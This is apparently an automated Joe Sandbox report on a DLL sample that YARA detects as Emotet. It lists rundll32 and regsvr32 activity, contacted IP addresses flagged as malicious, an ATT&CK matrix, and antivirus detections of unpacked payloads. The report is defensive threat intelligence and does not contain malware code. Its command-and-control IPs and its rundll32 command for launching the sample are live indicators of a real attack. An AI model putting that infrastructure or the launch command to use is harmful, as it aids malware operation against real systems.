Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	2_2_10027704
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	2_2_1000A803
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	2_2_10023880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	3_2_10027704
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	3_2_1000A803
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_10023880

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10022853 cpuid

2_2_10022853

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_1001F914 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_1001F914

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_100178B6

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.48d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e50000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5140000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.49c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.3250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5140000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.49f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4a20000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5110000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.52a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.49f0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4760000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5170000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4a50000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.50e0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4a20000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.3250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.49c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4b80000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4b30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.50e0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4b80000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4730000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4860000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4860000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4730000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4f80000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4f80000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4890000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.52a0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.8e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4bb0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.52d0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2e20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.651219135.0000000003250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658773887.00000000052D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.663246683.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658783740.0000000004A51000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658642834.00000000050E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658723299.0000000005171000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.657974448.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.655430157.0000000002940000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658619486.0000000004860000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658517019.0000000004E81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658811817.0000000004B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658095730.0000000002E20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658757089.0000000004A20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.655623941.0000000004241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658582876.0000000004FB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658656384.0000000004891000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658747642.00000000052A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658668655.0000000005111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658839063.0000000004BB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658706042.00000000049C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658574169.0000000004761000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.663415496.00000000049F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658548495.0000000004730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658494027.0000000004E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658732893.00000000049F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658556614.0000000004F80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658697305.0000000005140000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100011C0 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		2_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100011C0 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		3_2_100011C0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading1	Process Injection111	Masquerading2	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion2	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection111	Security Account Manager	Security Software Discovery31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Virtualization/Sandbox Evasion2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Regsvr321	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	System Information Discovery35	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	File Deletion1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
EcJ8rbg.dll	40%	Virustotal		Browse
EcJ8rbg.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.2.rundll32.exe.4760000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.rundll32.exe.49f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.2e20000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4e50000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.5140000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
7.2.rundll32.exe.4a50000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.48d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.5170000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.5110000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.4240000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.4a20000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
7.2.rundll32.exe.49f0000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.49c0000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
2.2.regsvr32.exe.3250000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
7.2.rundll32.exe.8b0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
7.2.rundll32.exe.4b80000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
2.2.regsvr32.exe.4b30000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.4730000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.50e0000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
7.2.rundll32.exe.4860000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4f80000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
7.2.rundll32.exe.4890000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.52a0000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
3.2.rundll32.exe.2940000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
7.2.rundll32.exe.8e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.4bb0000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.rundll32.exe.2f90000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4fb0000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.52d0000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.4e80000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000011.00000003.761511739.00000289AE991000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761615718.00000289AE9B1000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761553202.00000289AE97F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000011.00000003.761511739.00000289AE991000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761615718.00000289AE9B1000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761553202.00000289AE97F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000011.00000003.762429970.00000289AE978000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762444639.00000289AE989000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762645244.00000289AE99A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762542665.00000289AE9D2000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762524654.00000289AE9D2000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762611865.00000289AE978000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762579318.00000289AE9BB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 00000011.00000003.761511739.00000289AE991000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761615718.00000289AE9B1000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761553202.00000289AE97F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000011.00000003.761511739.00000289AE991000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761615718.00000289AE9B1000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761553202.00000289AE97F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
104.131.62.48	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
185.148.168.15	unknown	Germany	44780	EVERSCALE-ASDE	true
51.210.242.234	unknown	France	16276	OVHFR	true
217.182.143.207	unknown	France	16276	OVHFR	true
69.16.218.101	unknown	United States	32244	LIQUIDWEBUS	true
159.69.237.188	unknown	Germany	24940	HETZNER-ASDE	true
45.138.98.34	unknown	Germany	9009	M247GB	true
116.124.128.206	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
185.148.168.220	unknown	Germany	44780	EVERSCALE-ASDE	true
54.37.228.122	unknown	France	16276	OVHFR	true
190.90.233.66	unknown	Colombia	18678	INTERNEXASAESPCO	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
128.199.192.135	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553239
Start date:	14.01.2022
Start time:	14:39:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	EcJ8rbg.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winDLL@21/2@0/27
EGA Information:	Successful, ratio: 80%
HDC Information:	Successful, ratio: 34.1% (good quality ratio 32.8%) Quality average: 78% Quality standard deviation: 24.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 43 Number of non-executed functions: 195
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.91.112.76 Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:41:01	API Interceptor	7x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	gyZm68Cgwf.dll	Get hash	malicious	Browse
	5o8zdV3GU3.dll	Get hash	malicious	Browse
	aoPHg7b78c.dll	Get hash	malicious	Browse
	xxWrY2YG7s.dll	Get hash	malicious	Browse
	7MhGa3iotM.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
	M2hsMd9hTq.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	8ozP45Xn3V.dll	Get hash	malicious	Browse
	pugKLanrj3.dll	Get hash	malicious	Browse
	CSxylfUJcL.dll	Get hash	malicious	Browse
	nCiZXrlB39.dll	Get hash	malicious	Browse
	bEK6Xc41qp.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse
	qJQ5zHpsbm.dll	Get hash	malicious	Browse
	EtUNsUHRzq.dll	Get hash	malicious	Browse
	PyqpE3VUI3.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsm	Get hash	malicious	Browse
104.131.62.48	gyZm68Cgwf.dll	Get hash	malicious	Browse
	5o8zdV3GU3.dll	Get hash	malicious	Browse
	aoPHg7b78c.dll	Get hash	malicious	Browse
	xxWrY2YG7s.dll	Get hash	malicious	Browse
	7MhGa3iotM.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
	M2hsMd9hTq.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	8ozP45Xn3V.dll	Get hash	malicious	Browse
	pugKLanrj3.dll	Get hash	malicious	Browse
	CSxylfUJcL.dll	Get hash	malicious	Browse
	nCiZXrlB39.dll	Get hash	malicious	Browse
	bEK6Xc41qp.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse
	qJQ5zHpsbm.dll	Get hash	malicious	Browse
	EtUNsUHRzq.dll	Get hash	malicious	Browse
	PyqpE3VUI3.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsm	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	Comrpobante_60.vbs	Get hash	malicious	Browse	149.248.50.230
	sample.js	Get hash	malicious	Browse	45.76.154.237
	gyZm68Cgwf.dll	Get hash	malicious	Browse	66.42.57.149
	5o8zdV3GU3.dll	Get hash	malicious	Browse	66.42.57.149
	aoPHg7b78c.dll	Get hash	malicious	Browse	66.42.57.149
	xxWrY2YG7s.dll	Get hash	malicious	Browse	66.42.57.149
	7MhGa3iotM.dll	Get hash	malicious	Browse	66.42.57.149
	vHwdqVl8yP.dll	Get hash	malicious	Browse	66.42.57.149
	M2hsMd9hTq.dll	Get hash	malicious	Browse	66.42.57.149
	wg1bXKYOOs.dll	Get hash	malicious	Browse	66.42.57.149
	8ozP45Xn3V.dll	Get hash	malicious	Browse	66.42.57.149
	pugKLanrj3.dll	Get hash	malicious	Browse	66.42.57.149
	CSxylfUJcL.dll	Get hash	malicious	Browse	66.42.57.149
	nCiZXrlB39.dll	Get hash	malicious	Browse	66.42.57.149
	bEK6Xc41qp.dll	Get hash	malicious	Browse	66.42.57.149
	vHwdqVl8yP.dll	Get hash	malicious	Browse	66.42.57.149
	wg1bXKYOOs.dll	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse	66.42.57.149
	qJQ5zHpsbm.dll	Get hash	malicious	Browse	66.42.57.149
	EtUNsUHRzq.dll	Get hash	malicious	Browse	66.42.57.149
DIGITALOCEAN-ASNUS	P42zLwaJQk.exe	Get hash	malicious	Browse	188.166.28.199
	9ro85QVN0F.exe	Get hash	malicious	Browse	188.166.28.199
	hWLlYv2MAX	Get hash	malicious	Browse	159.89.53.206
	sample.js	Get hash	malicious	Browse	138.197.222.36
	Mc7TWWp1Vp.exe	Get hash	malicious	Browse	188.166.28.199
	sbxGIUIhRd.exe	Get hash	malicious	Browse	188.166.28.199
	6zsU4O4WHq.exe	Get hash	malicious	Browse	188.166.28.199
	Bank Swift Copy 1027263738.exe	Get hash	malicious	Browse	178.128.244.245
	gyZm68Cgwf.dll	Get hash	malicious	Browse	128.199.192.135
	5o8zdV3GU3.dll	Get hash	malicious	Browse	128.199.192.135
	aoPHg7b78c.dll	Get hash	malicious	Browse	128.199.192.135
	xxWrY2YG7s.dll	Get hash	malicious	Browse	128.199.192.135
	7MhGa3iotM.dll	Get hash	malicious	Browse	128.199.192.135
	urMpgNNXPM.exe	Get hash	malicious	Browse	188.166.28.199
	DH-1642092507.xll	Get hash	malicious	Browse	159.89.171.14
	vHwdqVl8yP.dll	Get hash	malicious	Browse	128.199.192.135
	M2hsMd9hTq.dll	Get hash	malicious	Browse	128.199.192.135
	wg1bXKYOOs.dll	Get hash	malicious	Browse	128.199.192.135
	zmbGUZTICp.exe	Get hash	malicious	Browse	188.166.28.199
	8ozP45Xn3V.dll	Get hash	malicious	Browse	128.199.192.135

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
